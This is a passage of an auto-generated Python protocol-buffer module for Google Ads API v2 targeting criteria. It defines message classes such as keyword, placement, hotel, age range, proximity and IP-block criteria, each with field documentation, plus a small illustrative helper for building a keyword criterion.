DESCRIPTOR.message_types_by_name['MobileAppCategoryInfo'] = _MOBILEAPPCATEGORYINFO
DESCRIPTOR.message_types_by_name['MobileApplicationInfo'] = _MOBILEAPPLICATIONINFO
DESCRIPTOR.message_types_by_name['LocationInfo'] = _LOCATIONINFO
DESCRIPTOR.message_types_by_name['DeviceInfo'] = _DEVICEINFO
DESCRIPTOR.message_types_by_name['PreferredContentInfo'] = _PREFERREDCONTENTINFO
DESCRIPTOR.message_types_by_name['ListingGroupInfo'] = _LISTINGGROUPINFO
DESCRIPTOR.message_types_by_name['ListingScopeInfo'] = _LISTINGSCOPEINFO
DESCRIPTOR.message_types_by_name['ListingDimensionInfo'] = _LISTINGDIMENSIONINFO
DESCRIPTOR.message_types_by_name['ListingBrandInfo'] = _LISTINGBRANDINFO
DESCRIPTOR.message_types_by_name['HotelIdInfo'] = _HOTELIDINFO
DESCRIPTOR.message_types_by_name['HotelClassInfo'] = _HOTELCLASSINFO
DESCRIPTOR.message_types_by_name['HotelCountryRegionInfo'] = _HOTELCOUNTRYREGIONINFO
DESCRIPTOR.message_types_by_name['HotelStateInfo'] = _HOTELSTATEINFO
DESCRIPTOR.message_types_by_name['HotelCityInfo'] = _HOTELCITYINFO
DESCRIPTOR.message_types_by_name['ListingCustomAttributeInfo'] = _LISTINGCUSTOMATTRIBUTEINFO
DESCRIPTOR.message_types_by_name['ProductBiddingCategoryInfo'] = _PRODUCTBIDDINGCATEGORYINFO
DESCRIPTOR.message_types_by_name['ProductChannelInfo'] = _PRODUCTCHANNELINFO
DESCRIPTOR.message_types_by_name['ProductChannelExclusivityInfo'] = _PRODUCTCHANNELEXCLUSIVITYINFO
DESCRIPTOR.message_types_by_name['ProductConditionInfo'] = _PRODUCTCONDITIONINFO
DESCRIPTOR.message_types_by_name['ProductItemIdInfo'] = _PRODUCTITEMIDINFO
DESCRIPTOR.message_types_by_name['ProductTypeInfo'] = _PRODUCTTYPEINFO
DESCRIPTOR.message_types_by_name['UnknownListingDimensionInfo'] = _UNKNOWNLISTINGDIMENSIONINFO
DESCRIPTOR.message_types_by_name['HotelDateSelectionTypeInfo'] = _HOTELDATESELECTIONTYPEINFO
DESCRIPTOR.message_types_by_name['HotelAdvanceBookingWindowInfo'] = _HOTELADVANCEBOOKINGWINDOWINFO
DESCRIPTOR.message_types_by_name['HotelLengthOfStayInfo'] = _HOTELLENGTHOFSTAYINFO
DESCRIPTOR.message_types_by_name['HotelCheckInDayInfo'] = _HOTELCHECKINDAYINFO
DESCRIPTOR.message_types_by_name['InteractionTypeInfo'] = _INTERACTIONTYPEINFO
DESCRIPTOR.message_types_by_name['AdScheduleInfo'] = _ADSCHEDULEINFO
DESCRIPTOR.message_types_by_name['AgeRangeInfo'] = _AGERANGEINFO
DESCRIPTOR.message_types_by_name['GenderInfo'] = _GENDERINFO
DESCRIPTOR.message_types_by_name['IncomeRangeInfo'] = _INCOMERANGEINFO
DESCRIPTOR.message_types_by_name['ParentalStatusInfo'] = _PARENTALSTATUSINFO
DESCRIPTOR.message_types_by_name['YouTubeVideoInfo'] = _YOUTUBEVIDEOINFO
DESCRIPTOR.message_types_by_name['YouTubeChannelInfo'] = _YOUTUBECHANNELINFO
DESCRIPTOR.message_types_by_name['UserListInfo'] = _USERLISTINFO
DESCRIPTOR.message_types_by_name['ProximityInfo'] = _PROXIMITYINFO
DESCRIPTOR.message_types_by_name['GeoPointInfo'] = _GEOPOINTINFO
DESCRIPTOR.message_types_by_name['AddressInfo'] = _ADDRESSINFO
DESCRIPTOR.message_types_by_name['TopicInfo'] = _TOPICINFO
DESCRIPTOR.message_types_by_name['LanguageInfo'] = _LANGUAGEINFO
DESCRIPTOR.message_types_by_name['IpBlockInfo'] = _IPBLOCKINFO
DESCRIPTOR.message_types_by_name['ContentLabelInfo'] = _CONTENTLABELINFO
DESCRIPTOR.message_types_by_name['CarrierInfo'] = _CARRIERINFO
DESCRIPTOR.message_types_by_name['UserInterestInfo'] = _USERINTERESTINFO
DESCRIPTOR.message_types_by_name['WebpageInfo'] = _WEBPAGEINFO
DESCRIPTOR.message_types_by_name['WebpageConditionInfo'] = _WEBPAGECONDITIONINFO
DESCRIPTOR.message_types_by_name['OperatingSystemVersionInfo'] = _OPERATINGSYSTEMVERSIONINFO
DESCRIPTOR.message_types_by_name['AppPaymentModelInfo'] = _APPPAYMENTMODELINFO
DESCRIPTOR.message_types_by_name['MobileDeviceInfo'] = _MOBILEDEVICEINFO
DESCRIPTOR.message_types_by_name['CustomAffinityInfo'] = _CUSTOMAFFINITYINFO
DESCRIPTOR.message_types_by_name['CustomIntentInfo'] = _CUSTOMINTENTINFO
DESCRIPTOR.message_types_by_name['LocationGroupInfo'] = _LOCATIONGROUPINFO
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
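# From here on, each message gets a concrete Python class built from its
# descriptor via GeneratedProtocolMessageType and registered with the symbol
# database; the __doc__ strings are carried over from the comments in the
# .proto source.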
KeywordInfo = _reflection.GeneratedProtocolMessageType('KeywordInfo', (_message.Message,), dict(
DESCRIPTOR = _KEYWORDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A keyword criterion.
Attributes:
text:
The text of the keyword (at most 80 characters and 10 words).
match_type:
The match type of the keyword.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.KeywordInfo)
))
_sym_db.RegisterMessage(KeywordInfo)
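# Illustrative sketch only, not part of the protoc output: one way a
# KeywordInfo criterion could be populated through this module. The helper
# name and sample values are hypothetical, and the function is never called,
# so importing this module is unaffected.
def _example_keyword_info():
    kw = KeywordInfo()
    # 'text' is a google.protobuf.StringValue wrapper, hence the nested .value.
    kw.text.value = 'red running shoes'
    # 'match_type' is an enum field (KeywordMatchTypeEnum.KeywordMatchType) and
    # would normally be set from the corresponding keyword_match_type enum module.
    return kw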
PlacementInfo = _reflection.GeneratedProtocolMessageType('PlacementInfo', (_message.Message,), dict(
DESCRIPTOR = _PLACEMENTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A placement criterion. This can be used to modify bids for sites when
targeting the content network.
Attributes:
url:
URL of the placement. For example, "http://www.domain.com".
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.PlacementInfo)
))
_sym_db.RegisterMessage(PlacementInfo)
MobileAppCategoryInfo = _reflection.GeneratedProtocolMessageType('MobileAppCategoryInfo', (_message.Message,), dict(
DESCRIPTOR = _MOBILEAPPCATEGORYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A mobile app category criterion.
Attributes:
mobile_app_category_constant:
The mobile app category constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.MobileAppCategoryInfo)
))
_sym_db.RegisterMessage(MobileAppCategoryInfo)
MobileApplicationInfo = _reflection.GeneratedProtocolMessageType('MobileApplicationInfo', (_message.Message,), dict(
DESCRIPTOR = _MOBILEAPPLICATIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A mobile application criterion.
Attributes:
app_id:
A string that uniquely identifies a mobile application to
Google Ads API. The format of this string is
"{platform}-{platform\_native\_id}", where platform is "1" for
iOS apps and "2" for Android apps, and where
platform\_native\_id is the mobile application identifier
native to the corresponding platform. For iOS, this native
identifier is the 9 digit string that appears at the end of an
App Store URL (e.g., "476943146" for "Flood-It! 2" whose App
Store link is http://itunes.apple.com/us/app/flood-it!-2/id476943146).
For Android, this native identifier is the application's package name
(e.g., "com.labpixies.colordrips" for "Color Drips" given Google Play link
https://play.google.com/store/apps/details?id=com.labpixies.colordrips). A well
formed app id for Google Ads API would thus be "1-476943146"
for iOS and "2-com.labpixies.colordrips" for Android. This
field is required and must be set in CREATE operations.
name:
Name of this mobile application.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.MobileApplicationInfo)
))
_sym_db.RegisterMessage(MobileApplicationInfo)
LocationInfo = _reflection.GeneratedProtocolMessageType('LocationInfo', (_message.Message,), dict(
DESCRIPTOR = _LOCATIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A location criterion.
Attributes:
geo_target_constant:
The geo target constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.LocationInfo)
))
_sym_db.RegisterMessage(LocationInfo)
DeviceInfo = _reflection.GeneratedProtocolMessageType('DeviceInfo', (_message.Message,), dict(
DESCRIPTOR = _DEVICEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A device criterion.
Attributes:
type:
Type of the device.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.DeviceInfo)
))
_sym_db.RegisterMessage(DeviceInfo)
PreferredContentInfo = _reflection.GeneratedProtocolMessageType('PreferredContentInfo', (_message.Message,), dict(
DESCRIPTOR = _PREFERREDCONTENTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A preferred content criterion.
Attributes:
type:
Type of the preferred content.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.PreferredContentInfo)
))
_sym_db.RegisterMessage(PreferredContentInfo)
ListingGroupInfo = _reflection.GeneratedProtocolMessageType('ListingGroupInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGGROUPINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A listing group criterion.
Attributes:
type:
Type of the listing group.
case_value:
Dimension value with which this listing group is refining its
parent. Undefined for the root group.
parent_ad_group_criterion:
Resource name of ad group criterion which is the parent
listing group subdivision. Null for the root group.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingGroupInfo)
))
_sym_db.RegisterMessage(ListingGroupInfo)
ListingScopeInfo = _reflection.GeneratedProtocolMessageType('ListingScopeInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGSCOPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A listing scope criterion.
Attributes:
dimensions:
Scope of the campaign criterion.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingScopeInfo)
))
_sym_db.RegisterMessage(ListingScopeInfo)
ListingDimensionInfo = _reflection.GeneratedProtocolMessageType('ListingDimensionInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGDIMENSIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Listing dimensions for listing group criterion.
Attributes:
dimension:
Dimension of one of the types below is always present.
listing_brand:
Brand of the listing.
hotel_id:
Advertiser-specific hotel ID.
hotel_class:
Class of the hotel as a number of stars 1 to 5.
hotel_country_region:
Country or Region the hotel is located in.
hotel_state:
State the hotel is located in.
hotel_city:
City the hotel is located in.
listing_custom_attribute:
Listing custom attribute.
product_bidding_category:
Bidding category of a product offer.
product_channel:
Locality of a product offer.
product_channel_exclusivity:
Availability of a product offer.
product_condition:
Condition of a product offer.
product_item_id:
Item id of a product offer.
product_type:
Type of a product offer.
unknown_listing_dimension:
Unknown dimension. Set when no other listing dimension is set.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingDimensionInfo)
))
_sym_db.RegisterMessage(ListingDimensionInfo)
ListingBrandInfo = _reflection.GeneratedProtocolMessageType('ListingBrandInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGBRANDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Brand of the listing.
Attributes:
value:
String value of the listing brand.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingBrandInfo)
))
_sym_db.RegisterMessage(ListingBrandInfo)
HotelIdInfo = _reflection.GeneratedProtocolMessageType('HotelIdInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELIDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Advertiser-specific hotel ID.
Attributes:
value:
String value of the hotel ID.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelIdInfo)
))
_sym_db.RegisterMessage(HotelIdInfo)
HotelClassInfo = _reflection.GeneratedProtocolMessageType('HotelClassInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCLASSINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Class of the hotel as a number of stars 1 to 5.
Attributes:
value:
Long value of the hotel class.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelClassInfo)
))
_sym_db.RegisterMessage(HotelClassInfo)
HotelCountryRegionInfo = _reflection.GeneratedProtocolMessageType('HotelCountryRegionInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCOUNTRYREGIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Country or Region the hotel is located in.
Attributes:
country_region_criterion:
The Geo Target Constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelCountryRegionInfo)
))
_sym_db.RegisterMessage(HotelCountryRegionInfo)
HotelStateInfo = _reflection.GeneratedProtocolMessageType('HotelStateInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELSTATEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """State the hotel is located in.
Attributes:
state_criterion:
The Geo Target Constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelStateInfo)
))
_sym_db.RegisterMessage(HotelStateInfo)
HotelCityInfo = _reflection.GeneratedProtocolMessageType('HotelCityInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """City the hotel is located in.
Attributes:
city_criterion:
The Geo Target Constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelCityInfo)
))
_sym_db.RegisterMessage(HotelCityInfo)
ListingCustomAttributeInfo = _reflection.GeneratedProtocolMessageType('ListingCustomAttributeInfo', (_message.Message,), dict(
DESCRIPTOR = _LISTINGCUSTOMATTRIBUTEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Listing custom attribute.
Attributes:
value:
String value of the listing custom attribute.
index:
Indicates the index of the custom attribute.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ListingCustomAttributeInfo)
))
_sym_db.RegisterMessage(ListingCustomAttributeInfo)
ProductBiddingCategoryInfo = _reflection.GeneratedProtocolMessageType('ProductBiddingCategoryInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTBIDDINGCATEGORYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Bidding category of a product offer.
Attributes:
id:
ID of the product bidding category. This ID is equivalent to
the google\_product\_category ID as described in this article:
https://support.google.com/merchants/answer/6324436.
country_code:
Two-letter upper-case country code of the product bidding
category. It must match the
campaign.shopping\_setting.sales\_country field.
level:
Level of the product bidding category.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductBiddingCategoryInfo)
))
_sym_db.RegisterMessage(ProductBiddingCategoryInfo)
ProductChannelInfo = _reflection.GeneratedProtocolMessageType('ProductChannelInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTCHANNELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Locality of a product offer.
Attributes:
channel:
Value of the locality.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductChannelInfo)
))
_sym_db.RegisterMessage(ProductChannelInfo)
ProductChannelExclusivityInfo = _reflection.GeneratedProtocolMessageType('ProductChannelExclusivityInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTCHANNELEXCLUSIVITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Availability of a product offer.
Attributes:
channel_exclusivity:
Value of the availability.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductChannelExclusivityInfo)
))
_sym_db.RegisterMessage(ProductChannelExclusivityInfo)
ProductConditionInfo = _reflection.GeneratedProtocolMessageType('ProductConditionInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTCONDITIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Condition of a product offer.
Attributes:
condition:
Value of the condition.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductConditionInfo)
))
_sym_db.RegisterMessage(ProductConditionInfo)
ProductItemIdInfo = _reflection.GeneratedProtocolMessageType('ProductItemIdInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTITEMIDINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Item id of a product offer.
Attributes:
value:
Value of the id.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductItemIdInfo)
))
_sym_db.RegisterMessage(ProductItemIdInfo)
ProductTypeInfo = _reflection.GeneratedProtocolMessageType('ProductTypeInfo', (_message.Message,), dict(
DESCRIPTOR = _PRODUCTTYPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Type of a product offer.
Attributes:
value:
Value of the type.
level:
Level of the type.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProductTypeInfo)
))
_sym_db.RegisterMessage(ProductTypeInfo)
UnknownListingDimensionInfo = _reflection.GeneratedProtocolMessageType('UnknownListingDimensionInfo', (_message.Message,), dict(
DESCRIPTOR = _UNKNOWNLISTINGDIMENSIONINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Unknown listing dimension.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.UnknownListingDimensionInfo)
))
_sym_db.RegisterMessage(UnknownListingDimensionInfo)
HotelDateSelectionTypeInfo = _reflection.GeneratedProtocolMessageType('HotelDateSelectionTypeInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELDATESELECTIONTYPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for hotel date selection (default dates vs. user selected).
Attributes:
type:
Type of the hotel date selection
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelDateSelectionTypeInfo)
))
_sym_db.RegisterMessage(HotelDateSelectionTypeInfo)
HotelAdvanceBookingWindowInfo = _reflection.GeneratedProtocolMessageType('HotelAdvanceBookingWindowInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELADVANCEBOOKINGWINDOWINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for number of days prior to the stay the booking is being
made.
Attributes:
min_days:
Low end of the number of days prior to the stay.
max_days:
High end of the number of days prior to the stay.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelAdvanceBookingWindowInfo)
))
_sym_db.RegisterMessage(HotelAdvanceBookingWindowInfo)
HotelLengthOfStayInfo = _reflection.GeneratedProtocolMessageType('HotelLengthOfStayInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELLENGTHOFSTAYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for length of hotel stay in nights.
Attributes:
min_nights:
Low end of the number of nights in the stay.
max_nights:
High end of the number of nights in the stay.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelLengthOfStayInfo)
))
_sym_db.RegisterMessage(HotelLengthOfStayInfo)
HotelCheckInDayInfo = _reflection.GeneratedProtocolMessageType('HotelCheckInDayInfo', (_message.Message,), dict(
DESCRIPTOR = _HOTELCHECKINDAYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for day of the week the booking is for.
Attributes:
day_of_week:
The day of the week.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.HotelCheckInDayInfo)
))
_sym_db.RegisterMessage(HotelCheckInDayInfo)
InteractionTypeInfo = _reflection.GeneratedProtocolMessageType('InteractionTypeInfo', (_message.Message,), dict(
DESCRIPTOR = _INTERACTIONTYPEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Criterion for Interaction Type.
Attributes:
type:
The interaction type.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.InteractionTypeInfo)
))
_sym_db.RegisterMessage(InteractionTypeInfo)
AdScheduleInfo = _reflection.GeneratedProtocolMessageType('AdScheduleInfo', (_message.Message,), dict(
DESCRIPTOR = _ADSCHEDULEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents an AdSchedule criterion.
AdSchedule is specified as the day of the week and a time interval
within which ads will be shown.
No more than six AdSchedules can be added for the same day.
Attributes:
start_minute:
Minutes after the start hour at which this schedule starts.
This field is required for CREATE operations and is prohibited
on UPDATE operations.
end_minute:
Minutes after the end hour at which this schedule ends. The
schedule is exclusive of the end minute. This field is
required for CREATE operations and is prohibited on UPDATE
operations.
start_hour:
Starting hour in 24 hour time. This field must be between 0
and 23, inclusive. This field is required for CREATE
operations and is prohibited on UPDATE operations.
end_hour:
Ending hour in 24 hour time; 24 signifies end of the day. This
field must be between 0 and 24, inclusive. This field is
required for CREATE operations and is prohibited on UPDATE
operations.
day_of_week:
Day of the week the schedule applies to. This field is
required for CREATE operations and is prohibited on UPDATE
operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AdScheduleInfo)
))
_sym_db.RegisterMessage(AdScheduleInfo)
AgeRangeInfo = _reflection.GeneratedProtocolMessageType('AgeRangeInfo', (_message.Message,), dict(
DESCRIPTOR = _AGERANGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An age range criterion.
Attributes:
type:
Type of the age range.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AgeRangeInfo)
))
_sym_db.RegisterMessage(AgeRangeInfo)
GenderInfo = _reflection.GeneratedProtocolMessageType('GenderInfo', (_message.Message,), dict(
DESCRIPTOR = _GENDERINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A gender criterion.
Attributes:
type:
Type of the gender.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.GenderInfo)
))
_sym_db.RegisterMessage(GenderInfo)
IncomeRangeInfo = _reflection.GeneratedProtocolMessageType('IncomeRangeInfo', (_message.Message,), dict(
DESCRIPTOR = _INCOMERANGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An income range criterion.
Attributes:
type:
Type of the income range.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.IncomeRangeInfo)
))
_sym_db.RegisterMessage(IncomeRangeInfo)
ParentalStatusInfo = _reflection.GeneratedProtocolMessageType('ParentalStatusInfo', (_message.Message,), dict(
DESCRIPTOR = _PARENTALSTATUSINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A parental status criterion.
Attributes:
type:
Type of the parental status.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ParentalStatusInfo)
))
_sym_db.RegisterMessage(ParentalStatusInfo)
YouTubeVideoInfo = _reflection.GeneratedProtocolMessageType('YouTubeVideoInfo', (_message.Message,), dict(
DESCRIPTOR = _YOUTUBEVIDEOINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A YouTube Video criterion.
Attributes:
video_id:
YouTube video id as it appears on the YouTube watch page.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.YouTubeVideoInfo)
))
_sym_db.RegisterMessage(YouTubeVideoInfo)
YouTubeChannelInfo = _reflection.GeneratedProtocolMessageType('YouTubeChannelInfo', (_message.Message,), dict(
DESCRIPTOR = _YOUTUBECHANNELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A YouTube Channel criterion.
Attributes:
channel_id:
The YouTube uploader channel id or the channel code of a
YouTube channel.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.YouTubeChannelInfo)
))
_sym_db.RegisterMessage(YouTubeChannelInfo)
UserListInfo = _reflection.GeneratedProtocolMessageType('UserListInfo', (_message.Message,), dict(
DESCRIPTOR = _USERLISTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A User List criterion. Represents a user list that is defined by the
advertiser to be targeted.
Attributes:
user_list:
The User List resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.UserListInfo)
))
_sym_db.RegisterMessage(UserListInfo)
ProximityInfo = _reflection.GeneratedProtocolMessageType('ProximityInfo', (_message.Message,), dict(
DESCRIPTOR = _PROXIMITYINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A Proximity criterion. The geo point and radius determine what
geographical area is included. The address is a description of the geo
point that does not affect ad serving.
There are two ways to create a proximity. First, by setting an address
and radius. The geo point will be automatically computed. Second, by
setting a geo point and radius. The address is an optional label that
won't be validated.
Attributes:
geo_point:
Latitude and longitude.
radius:
The radius of the proximity.
radius_units:
The unit of measurement of the radius. Default is KILOMETERS.
address:
Full address.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ProximityInfo)
))
_sym_db.RegisterMessage(ProximityInfo)
GeoPointInfo = _reflection.GeneratedProtocolMessageType('GeoPointInfo', (_message.Message,), dict(
DESCRIPTOR = _GEOPOINTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Geo point for proximity criterion.
Attributes:
longitude_in_micro_degrees:
Micro degrees for the longitude.
latitude_in_micro_degrees:
Micro degrees for the latitude.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.GeoPointInfo)
))
_sym_db.RegisterMessage(GeoPointInfo)
AddressInfo = _reflection.GeneratedProtocolMessageType('AddressInfo', (_message.Message,), dict(
DESCRIPTOR = _ADDRESSINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Address for proximity criterion.
Attributes:
postal_code:
Postal code.
province_code:
Province or state code.
country_code:
Country code.
province_name:
Province or state name.
street_address:
Street address line 1.
street_address2:
Street address line 2. This field is write-only. It is only
used for calculating the longitude and latitude of an address
when geo\_point is empty.
city_name:
Name of the city.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.AddressInfo)
))
_sym_db.RegisterMessage(AddressInfo)
TopicInfo = _reflection.GeneratedProtocolMessageType('TopicInfo', (_message.Message,), dict(
DESCRIPTOR = _TOPICINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A topic criterion. Use topics to target or exclude placements in the
Google Display Network based on the category into which the placement
falls (for example, "Pets & Animals/Pets/Dogs").
Attributes:
topic_constant:
The Topic Constant resource name.
path:
The category to target or exclude. Each subsequent element in
the array describes a more specific sub-category. For example,
"Pets & Animals", "Pets", "Dogs" represents the "Pets &
Animals/Pets/Dogs" category.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.TopicInfo)
))
_sym_db.RegisterMessage(TopicInfo)
LanguageInfo = _reflection.GeneratedProtocolMessageType('LanguageInfo', (_message.Message,), dict(
DESCRIPTOR = _LANGUAGEINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """A language criterion.
Attributes:
language_constant:
The language constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.LanguageInfo)
))
_sym_db.RegisterMessage(LanguageInfo)
IpBlockInfo = _reflection.GeneratedProtocolMessageType('IpBlockInfo', (_message.Message,), dict(
DESCRIPTOR = _IPBLOCKINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """An IpBlock criterion used for IP exclusions. We allow: - IPv4 and IPv6
addresses - individual addresses (192.168.0.1) - masks for individual
addresses (192.168.0.1/32) - masks for Class C networks (192.168.0.1/24)
Attributes:
ip_address:
The IP address of this IP block.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.IpBlockInfo)
))
_sym_db.RegisterMessage(IpBlockInfo)
ContentLabelInfo = _reflection.GeneratedProtocolMessageType('ContentLabelInfo', (_message.Message,), dict(
DESCRIPTOR = _CONTENTLABELINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Content Label for category exclusion.
Attributes:
type:
Content label type, required for CREATE operations.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.ContentLabelInfo)
))
_sym_db.RegisterMessage(ContentLabelInfo)
CarrierInfo = _reflection.GeneratedProtocolMessageType('CarrierInfo', (_message.Message,), dict(
DESCRIPTOR = _CARRIERINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents a Carrier Criterion.
Attributes:
carrier_constant:
The Carrier constant resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.CarrierInfo)
))
_sym_db.RegisterMessage(CarrierInfo)
UserInterestInfo = _reflection.GeneratedProtocolMessageType('UserInterestInfo', (_message.Message,), dict(
DESCRIPTOR = _USERINTERESTINFO,
__module__ = 'google.ads.googleads_v2.proto.common.criteria_pb2'
,
__doc__ = """Represents a particular interest-based topic to be targeted.
Attributes:
user_interest_category:
The UserInterest resource name.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v2.common.UserInterestInfo)
))
